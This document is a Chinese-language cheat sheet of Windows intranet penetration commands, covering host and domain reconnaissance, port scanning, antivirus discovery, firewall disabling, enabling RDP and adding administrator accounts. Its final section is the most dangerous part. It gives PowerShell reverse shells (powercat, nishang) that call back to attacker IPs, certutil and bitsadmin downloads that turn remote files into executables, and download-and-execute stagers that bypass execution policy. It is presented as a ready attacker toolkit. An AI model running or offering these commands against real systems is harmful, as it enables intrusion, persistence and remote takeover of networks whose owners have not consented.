Windows內網滲透信息搜集命令匯總
本機信息收集
查詢網絡配置信息
ipconfig /all
查詢本機的服務信息
wmic service list brief
查詢系統信息
systeminfo
查詢進程列表
tasklist / wmic process list brief
查看計劃任務
schtasks /query /fo LIST /v 列出計劃任務詳細信息
查看主機開機時間
net statistics workstation

用戶相關
net user 查看所有用戶
net localgroup administrators 獲取本地管理員信息
查看端口列表
netstat -ano
查看已打補丁
wmic qfe get Caption,Description,HotFixID,InstalledOn
查看共享列表
net share 查看本機共享列表和可訪問的域共享列表
wmic share get name,path,status 查找共享列表
路由表和arp高速緩存表
route print 路由表
arp -a arp高速緩存表
防火墻
netsh firewall set opmode disable 關閉防火墻(Windows Server 2003 以前的版本)
netsh advfirewall set allprofiles state off 關閉防火墻(Windows Server 2003 以后的版本)
netsh firewall show config 查看防火墻配置
如果上面的命令被棄用,則使用
netsh advfirewall firewall show rule name=all
根據參考,可以使用這個wmic一鍵獲取本機信息http://www.fuzzysecurity.com/scripts/files/wmic_info.rar
域信息收集
權限查看
whoami /all 查看自己的詳細權限
net user xxx /domain 查看域內指定用戶的權限
判斷是否存在域
.net time /domain 若出現以下情況則不存在域

若是報錯:發生系統錯誤5,則存在域,但該用戶不是域用戶
若是以下情況則說明存在域且已經在域中

查看域的名字
net config workstation

nslookup -type=srv _ldap._tcp

這個很爽,域控主機名和IP一塊弄出來了
探測域內存活主機
1.使用工具 nbtscan http://www.unixwiz.net/tools/nbtscan.html
2.查看arp高速緩存表
arp -a

3.ICMP協議探測(逐個ping)
這個賊慢,但是不用下載其他應用
CODE
for /L %I in (1,1,254) DO @ping -w 1 -n 1 192.168.1.%I | findstr "TTL"
4.nmap直接開掃
5.meterpreter會話中執行 run windows/gather/enum_ad_computers
掃描域內開放端口
1.nmap
nmap 192.168.1.0/24
2.工具 S掃描器
3.自寫腳本
CODE
#python3 慢的一批
import socket
def get_ip_status(ip,port):
server = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
try:
server.connect((ip,port))
print('{0} port {1} is open'.format(ip, port))
except Exception as err:
print('{0} port {1} is not open'.format(ip,port))
finally:
server.close()
if __name__ == '__main__':
host = '172.16.0.198'
for port in range(20,100):
get_ip_status(host,port)
域內基本信息
net group “domain computers” /domain 查詢所有域成員計算機列表
net view /domain:HACHE 查詢域內所有主機
net accounts /domain 獲取域密碼信息
nltest /domain_trusts 獲取域信任信息
nltest /DCLIST:hacke 查看域控制器機器名
Nslookup -type=SRV_ldap._tcp 查看域控制器的主機名
域用戶信息收集
net user /domain 向域控制器查詢域內用戶列表
wmic useraccount get /all 獲取域內用戶詳細信息
net localgroup administrators 查詢本地管理員用戶
net group “domain admins” /domain 查詢域管理員用戶
net group “Enterprise admins” /domain 查詢管理員用戶組
本機wmic查殺軟
WMIC /Node:localhost /Namespace:\\root\SecurityCenter2 Path AntiVirusProduct Get displayName /Format:List
or
WMIC /namespace:\root\securitycenter2 path antivirusproduct GET displayName,productState, pathToSignedProductExe
開3389
REG ADD HKLM\SYSTEM\CurrentControlSet\Control\Terminal” “Server /v fDenyTSConnections /t REG_DWORD /d 0 /f
用戶增刪改查
net user username password /add 加用戶
net localgroup administrators username /add 添加XX到管理員賬戶
一些喜歡用的
Windows 反彈shell
CODE
powershell IEX (New-Object System.Net.Webclient).DownloadString('https://raw.githubusercontent.com/besimorhino/powercat/master/powercat.ps1'); powercat -c 192.168.1.4 -p 9999 -e cmd
powershell IEX (New-Object Net.WebClient).DownloadString('https://raw.githubusercontent.com/samratashok/nishang/9a3c747bcf535ef82dc4c5c66aac36db47c2afde/Shells/Invoke-PowerShellTcp.ps1');Invoke-PowerShellTcp -Reverse -IPAddress 192.168.203.140 -port 6666
wmic 查殺軟
CODE
WMIC /namespace:\\root\securitycenter2 path antivirusproduct GET displayName,productState, pathToSignedProductExe WMIC /Node:localhost /Namespace:\\root\SecurityCenter2 Path AntiVirusProduct Get displayName /Format:List
開3389
CODE
REG ADD HKLM\SYSTEM\CurrentControlSet\Control\Terminal" "Server /v fDenyTSConnections /t REG_DWORD /d 00000000 /f wmic RDTOGGLE WHERE ServerName='%COMPUTERNAME%' call SetAllowTSConnections 1 wmic /namespace:\\root\cimv2\terminalservices path win32_tsgeneralsetting where (TerminalName ='RDP-Tcp') call setuserauthenticationrequired 0
常見殺軟進程名
https://blog.csdn.net/weixin_39997829/article/details/92666552
cmd下載
CODE
bitsadmin /transfer n http://www.xx.com/code.jpg c:\users\sdyp\desktop\ff.jpg C:\Temp>certutil.exe -urlcache -split -f "https://hackers.home/badcontent.txt" bad.txt C:\Temp>certutil.exe -decode bad.txt bad.exe
獲取盤符
CODE
wmic logicaldisk where drivetype=3 get deviceid
ps cs 上線
CODE
powershell.exe -c IEX((new-object net.webclient).downloadstring('http://xxx/a.ps1'))
powershell -exec bypass -c "(New-Object Net.WebClient).Proxy.Credentials=[Net.CredentialCache]::DefaultNetworkCredentials;iwr('http://webserver/payload.ps1')|iex"
powershell -exec bypass -f \\webdavserver\folder\payload.ps1 (smb)


